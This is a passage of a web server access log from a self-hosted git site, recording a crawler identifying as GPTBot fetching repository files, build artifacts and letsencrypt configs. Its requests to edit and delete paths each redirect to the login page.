"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:16:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=source" [Client 74.7.227.38] [Length 15784] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:16:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html?display=source" [Client 74.7.227.38] [Length 16352] [Gzip 5.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" -[17/Feb/2026:16:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode/launch.json?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/launch.json" -[17/Feb/2026:16:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11546] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10472] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11565] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 11941] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" -[17/Feb/2026:16:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 11942] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" -[17/Feb/2026:16:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 27529] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:16:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 11945] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" -[17/Feb/2026:16:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 42483] [Gzip 12.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:16:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 42292] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:16:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 11908] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" -[17/Feb/2026:16:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9748] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:16:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12170] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11288] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12170] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:33:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:16:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:16:33:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:16:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:16:33:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:16:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:16:33:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:16:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:16:33:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:16:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:16:33:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:16:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:16:33:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:16:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:16:33:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:16:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:16:33:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:16:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:16:33:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:16:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:16:33:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:16:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:16:33:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:16:33:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:16:33:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:16:33:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:16:33:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:16:33:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:16:33:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:16:33:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:16:33:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:16:33:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:16:33:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10014] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10015] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12081] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12083] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11373] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:33:56 